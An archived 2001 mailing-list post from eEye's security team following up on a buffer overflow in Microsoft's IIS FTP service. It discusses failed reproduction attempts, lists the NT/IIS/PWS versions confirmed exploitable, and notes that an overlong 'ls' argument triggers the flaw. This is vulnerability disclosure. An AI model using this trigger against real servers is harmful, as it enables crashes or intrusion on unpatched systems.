I am still receiving eMails such as: >Not to burst anyones bubble, or Im doing it wrong, but in testing my ftp >server at my office which is an NT4.0 sp3, iis 4.0 box. I cant even put in >that many letters to make it crash.. Please understand that the above is a client side restriction.. The only valid eMail I have gotten, and has pretty much been proven so far, was from Mnemonix were he couldnt reproduce the overflow on NT 4 Server IIS4 (installed from NT 4 Option pack) with service Pack 3 - no hotfixes. He used telnet to establish the session to the FTP server and then issued the PORT command and had netcat listen on the port. He then tried the overflow and it did not work. This very well may be true because we did not test sp3. There seems to be some mixed findings... some I am not sure if the people eMailing me are doing it wrong and some could be configuration differences. Which ever the case its up to Microsoft to fix the problem. We do know positivily the following: NT + Option Pack Four (IIS4) + sp4 is exploitable NT + IIS3 + sp4 is exploitable PWS1.0 is exploitable. I am going to go pass out now. Signed, Marc eEye Digital Security Team www.eEye.com P.S. Some of the Unix ftp clients also malform the request so even though to the eye it looks like its sending the correct "ls (aaa...)" it doesnt send it correctly. Some goes for NT4.0's ftp.exe and a few others.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:30:46 PDT